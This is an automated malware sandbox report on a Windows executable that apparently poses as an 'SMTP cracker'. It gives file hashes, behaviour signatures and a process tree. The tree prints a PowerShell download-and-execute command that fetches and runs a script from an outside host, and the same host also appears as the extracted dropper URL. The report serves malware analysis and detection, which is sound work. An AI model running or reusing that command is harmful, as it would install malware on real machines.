Analysis

  • max time kernel
    91s
  • max time network
    47s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    17-05-2022 13:05

General

  • Target

    2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe

  • Size

    6.1MB

  • MD5

    5f9e61796a21e65f9a03f92ee6a8f6d8

  • SHA1

    d6032fd04db0fbb6195b6e8d31491a3fc289f1ce

  • SHA256

    2691ac49a444378f3c668c7eaaf0e0e0abf95c5c3053a516b3f9a78c9a8885ba

  • SHA512

    402ed4a2a376621e2674f1539c9ec6ac85b9118cb2133054ea2d960e98bf06efdd12b50f135841872450d3e07c231d2b6d8cab91315f05771226ec2546596eeb

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs (ps1.dropper): http://supportnimbuzz.hexat.com/3/Att.jpg

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 13 IoCs
  • Detects Pyinstaller 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe
    "C:\Users\Admin\AppData\Local\Temp\2691AC49A444378F3C668C7EAAF0E0E0ABF95C5C3053A.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1560
    • C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
      C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1440
      • C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
        C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:980
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c title SMTP CRACKER V3 By ARON-TN
          4⤵
            PID:2008
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WinUpdat.vbs"
        2⤵
        • Drops startup file
        • Suspicious use of WriteProcessMemory
        PID:1884
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -comma Invoke-Expression(New-Object Net.WebClient).DowNloAdSTRiNg.Invoke('http://supportnimbuzz.hexat.com/3/Att.jpg')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1016

    Network

    MITRE ATT&CK Matrix ATT&CK v6

      • Discovery: System Information Discovery, T1082 (1)

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\WinUpdat.exe
      Filesize

      5.8MB

      MD5

      81aabcc46ce7b6f11bb603020aa0b6a6

      SHA1

      00263d09f97b9be29f09c66b19722a70d2aff3a8

      SHA256

      3b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a

      SHA512

      06c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c

    • C:\Users\Admin\AppData\Local\Temp\WinUpdat.vbs
      Filesize

      545B

      MD5

      bf83a0622f50dfe26baed65b8fb73a93

      SHA1

      4dce1e24f1a465b427d3a8afce0c9719ef7b7a73

      SHA256

      ded94f48e84bf9d99d42fe67fd75ea6971a66b225a429e2c12295e7513ecf894

      SHA512

      2141e65f84486bc512e36dd5ad54371f286cdb7eb5e91f0e69c7910de4fbd932755e3f422feee54a3d2d3c074433ff9cb1bc4eef6842b5d9b9451bc21c75ff0e

    • C:\Users\Admin\AppData\Local\Temp\_MEI14402\MSVCR90.dll
      Filesize

      627KB

      MD5

      ab2156d75b2c9589f925fc2ab83607e6

      SHA1

      83990c32b1006e0558de27e55b3862f5ea554394

      SHA256

      bc832bfbc5fa36b6e712c9d3de99d5ebe57ec94fe2838ca2f81db42eed49efcc

      SHA512

      2ca212b1430bdd1824aa139185ceb33f2ed7d622de6d470870b256cad75f859fff13cde3547b717deca650652cbc8b0fe337c4e4c14ba3c21a360dda24706086

    • C:\Users\Admin\AppData\Local\Temp\_MEI14402\python27.dll
      Filesize

      3.3MB

      MD5

      3e35352c82fbccda9c372b8443f73e5e

      SHA1

      a30a055e2e7b12c0a6d56afc1869b3b5283ac889

      SHA256

      dce00d476314cd4c812e3b5471b84588d532d33a5f39d40c726914a893b88d07

      SHA512

      ea852cee8aa074cf78f6e30d71f30331273c4b6eeebe16f00a04df89ff7289a39d435fbb63105daa563344e275a8c7ae9d41df96c1903e00a3a512debfc9efae

    • C:\Users\Admin\AppData\Local\Temp\_MEI14~1\_ctypes.pyd
      Filesize

      119KB

      MD5

      f5ec0b24dfc7952241c7a86abfb61455

      SHA1

      84176ec5d9f6d106a3ac1724539dfccb7c4c6c33

      SHA256

      6c560fb6bac55b5b75ecd80d6f6efe797544fb6db060818f0a6e510ac5abd191

      SHA512

      91fad0a9b3a887b227fc5e40ebd0dc2e3a37805c02185ccd91547575e02c8196c76b96ce4bcc463e9993190e3b0a67ab5c8af1f5ada557f346a194455bc83040

    • C:\Users\Admin\AppData\Local\Temp\_MEI14~1\_hashlib.pyd
      Filesize

      1.6MB

      MD5

      c94e5379dc430bc98b676260a929c1c6

      SHA1

      11305c38d58b104a2bd834925bf44930a41a416c

      SHA256

      11e2ba61c5d94999bace0bd8af8ce75dc10c2c494ebb4120367f7fc98209b61d

      SHA512

      d7fee1005cd3d652b6eb6c3569e7a6f3fa197982cfbe4807a7916f7d05f92bb5a2f5283ee095900dd97bc9a78981ad253792ae98fe509f78faf95c379b75bc20

    • C:\Users\Admin\AppData\Local\Temp\_MEI14~1\_multiprocessing.pyd
      Filesize

      34KB

      MD5

      243a85355713e19c26c5f3f27e9876fd

      SHA1

      059006569bd693285ec0373724d49b23d592b2eb

      SHA256

      32e4b466a8915a0c4cea350a24c33f487bac9e473f6120376184ef9699cdb4a6

      SHA512

      ed1167144596d93a3dadff52f52c291b0d0be3065428fe4bdccc9f377af6c50ab85a7e3ebacd038cb7765b4f5ce19f4245d00d1e62540cf8c86ec4e8b754d962

    • C:\Users\Admin\AppData\Local\Temp\_MEI14~1\_socket.pyd
      Filesize

      50KB

      MD5

      542726bb334376b4ee0b20cb19853cbb

      SHA1

      66f88bffce320371e208b5993313b1d84e234dbf

      SHA256

      ed53d4157e38ff8aec102a87ff7e2d6879b36eeffd301726047f7517243ab279

      SHA512

      3bc38057f2a202808ef42f666bf1e008bebcfce41d8942b9d8dc006ea53fc8e76df012638dc5b6bf5c1a4c6175b2197308674e90cabe38711c4bfae95f0a1613

    • C:\Users\Admin\AppData\Local\Temp\_MEI14~1\_ssl.pyd
      Filesize

      2.0MB

      MD5

      1b4639e2970bc4a12e0715f161c26e15

      SHA1

      69c9f8152410380ae4e2465d1711c6d577f7da96

      SHA256

      260f8ab785e3b22c241d578a5442ff287b1bf13a886b077a105f0e85d1c3a774

      SHA512

      2f7d9e7af93f2916978cdc90bc2553f92b7a6b8097c3c7a4247e1eb06f5c94d63ca037489d67fa8680825c1813df94f21670ae53a9fb8605d2d45ed306ce4991

    • C:\Users\Admin\AppData\Local\Temp\_MEI14~1\select.pyd
      Filesize

      11KB

      MD5

      5659b1b9b316b0dd48556293fd2062f2

      SHA1

      0cb51157ad3655060bc3425174e6feabd8fee07a

      SHA256

      8affe8e006052571edcc086cef04df16c18b8c4de0584b80f870933f63fcd512

      SHA512

      f83860f5892f47d3a0a262ce175579a1a84c9ae1323a3533a5e2d695fd1da871ac96961759fde1f2dfeeecc13fd1c7c1dd2dd0c6f7d959ea467df3185d3be2e9

    • C:\Users\Admin\AppData\Local\Temp\_MEI14~1\unicodedata.pyd
      Filesize

      676KB

      MD5

      252a1e38d86c07ac3a476db9117e3453

      SHA1

      b708dc6b672f85f57e7da7a99ef5682616cca2bf

      SHA256

      8473ae688c862caf8f19ce6bb1bbbec1df8f44f9ddd3a9be8294a52a0d7b4d93

      SHA512

      aaf408548f255ceff1159bb4cb77276ca840e0ea53eff84aea3c5288382c7ea2a864ed32e2481eac58478faf580552ed97190bbd6f24c74464b14d369bdc309a

    • \Users\Admin\AppData\Local\Temp\WinUpdat.exe
      Filesize

      5.8MB

      MD5

      81aabcc46ce7b6f11bb603020aa0b6a6

      SHA1

      00263d09f97b9be29f09c66b19722a70d2aff3a8

      SHA256

      3b9f4a6c4c47ac8b8de82c05f2506af223f873bafaf8eb5f07c7f9e99634626a

      SHA512

      06c2359c68bc17e9660c0af8a6785f1a33f343b941842d94af0b76254525ba4a2b9f79b4eb6fd0029ae147122dd0945ac1fd65f254ffb1582b0e97079e2c9a7c

    • \Users\Admin\AppData\Local\Temp\_MEI14402\msvcr90.dll
      Filesize

      627KB

      MD5

      ab2156d75b2c9589f925fc2ab83607e6

      SHA1

      83990c32b1006e0558de27e55b3862f5ea554394

      SHA256

      bc832bfbc5fa36b6e712c9d3de99d5ebe57ec94fe2838ca2f81db42eed49efcc

      SHA512

      2ca212b1430bdd1824aa139185ceb33f2ed7d622de6d470870b256cad75f859fff13cde3547b717deca650652cbc8b0fe337c4e4c14ba3c21a360dda24706086

    • \Users\Admin\AppData\Local\Temp\_MEI14402\python27.dll
      Filesize

      3.3MB

      MD5

      3e35352c82fbccda9c372b8443f73e5e

      SHA1

      a30a055e2e7b12c0a6d56afc1869b3b5283ac889

      SHA256

      dce00d476314cd4c812e3b5471b84588d532d33a5f39d40c726914a893b88d07

      SHA512

      ea852cee8aa074cf78f6e30d71f30331273c4b6eeebe16f00a04df89ff7289a39d435fbb63105daa563344e275a8c7ae9d41df96c1903e00a3a512debfc9efae

    • \Users\Admin\AppData\Local\Temp\_MEI14~1\_ctypes.pyd
      Filesize

      119KB

      MD5

      f5ec0b24dfc7952241c7a86abfb61455

      SHA1

      84176ec5d9f6d106a3ac1724539dfccb7c4c6c33

      SHA256

      6c560fb6bac55b5b75ecd80d6f6efe797544fb6db060818f0a6e510ac5abd191

      SHA512

      91fad0a9b3a887b227fc5e40ebd0dc2e3a37805c02185ccd91547575e02c8196c76b96ce4bcc463e9993190e3b0a67ab5c8af1f5ada557f346a194455bc83040

    • \Users\Admin\AppData\Local\Temp\_MEI14~1\_hashlib.pyd
      Filesize

      1.6MB

      MD5

      c94e5379dc430bc98b676260a929c1c6

      SHA1

      11305c38d58b104a2bd834925bf44930a41a416c

      SHA256

      11e2ba61c5d94999bace0bd8af8ce75dc10c2c494ebb4120367f7fc98209b61d

      SHA512

      d7fee1005cd3d652b6eb6c3569e7a6f3fa197982cfbe4807a7916f7d05f92bb5a2f5283ee095900dd97bc9a78981ad253792ae98fe509f78faf95c379b75bc20

    • \Users\Admin\AppData\Local\Temp\_MEI14~1\_multiprocessing.pyd
      Filesize

      34KB

      MD5

      243a85355713e19c26c5f3f27e9876fd

      SHA1

      059006569bd693285ec0373724d49b23d592b2eb

      SHA256

      32e4b466a8915a0c4cea350a24c33f487bac9e473f6120376184ef9699cdb4a6

      SHA512

      ed1167144596d93a3dadff52f52c291b0d0be3065428fe4bdccc9f377af6c50ab85a7e3ebacd038cb7765b4f5ce19f4245d00d1e62540cf8c86ec4e8b754d962

    • \Users\Admin\AppData\Local\Temp\_MEI14~1\_socket.pyd
      Filesize

      50KB

      MD5

      542726bb334376b4ee0b20cb19853cbb

      SHA1

      66f88bffce320371e208b5993313b1d84e234dbf

      SHA256

      ed53d4157e38ff8aec102a87ff7e2d6879b36eeffd301726047f7517243ab279

      SHA512

      3bc38057f2a202808ef42f666bf1e008bebcfce41d8942b9d8dc006ea53fc8e76df012638dc5b6bf5c1a4c6175b2197308674e90cabe38711c4bfae95f0a1613

    • \Users\Admin\AppData\Local\Temp\_MEI14~1\_ssl.pyd
      Filesize

      2.0MB

      MD5

      1b4639e2970bc4a12e0715f161c26e15

      SHA1

      69c9f8152410380ae4e2465d1711c6d577f7da96

      SHA256

      260f8ab785e3b22c241d578a5442ff287b1bf13a886b077a105f0e85d1c3a774

      SHA512

      2f7d9e7af93f2916978cdc90bc2553f92b7a6b8097c3c7a4247e1eb06f5c94d63ca037489d67fa8680825c1813df94f21670ae53a9fb8605d2d45ed306ce4991

    • \Users\Admin\AppData\Local\Temp\_MEI14~1\select.pyd
      Filesize

      11KB

      MD5

      5659b1b9b316b0dd48556293fd2062f2

      SHA1

      0cb51157ad3655060bc3425174e6feabd8fee07a

      SHA256

      8affe8e006052571edcc086cef04df16c18b8c4de0584b80f870933f63fcd512

      SHA512

      f83860f5892f47d3a0a262ce175579a1a84c9ae1323a3533a5e2d695fd1da871ac96961759fde1f2dfeeecc13fd1c7c1dd2dd0c6f7d959ea467df3185d3be2e9

    • \Users\Admin\AppData\Local\Temp\_MEI14~1\unicodedata.pyd
      Filesize

      676KB

      MD5

      252a1e38d86c07ac3a476db9117e3453

      SHA1

      b708dc6b672f85f57e7da7a99ef5682616cca2bf

      SHA256

      8473ae688c862caf8f19ce6bb1bbbec1df8f44f9ddd3a9be8294a52a0d7b4d93

      SHA512

      aaf408548f255ceff1159bb4cb77276ca840e0ea53eff84aea3c5288382c7ea2a864ed32e2481eac58478faf580552ed97190bbd6f24c74464b14d369bdc309a

    • memory/980-62-0x0000000000000000-mapping.dmp
    • memory/1016-82-0x0000000000000000-mapping.dmp
    • memory/1016-84-0x0000000073640000-0x00000000736A1000-memory.dmp
      Filesize

      388KB

    • memory/1440-57-0x0000000000000000-mapping.dmp
    • memory/1560-54-0x00000000752B1000-0x00000000752B3000-memory.dmp
      Filesize

      8KB

    • memory/1884-79-0x0000000000000000-mapping.dmp
    • memory/2008-78-0x0000000000000000-mapping.dmp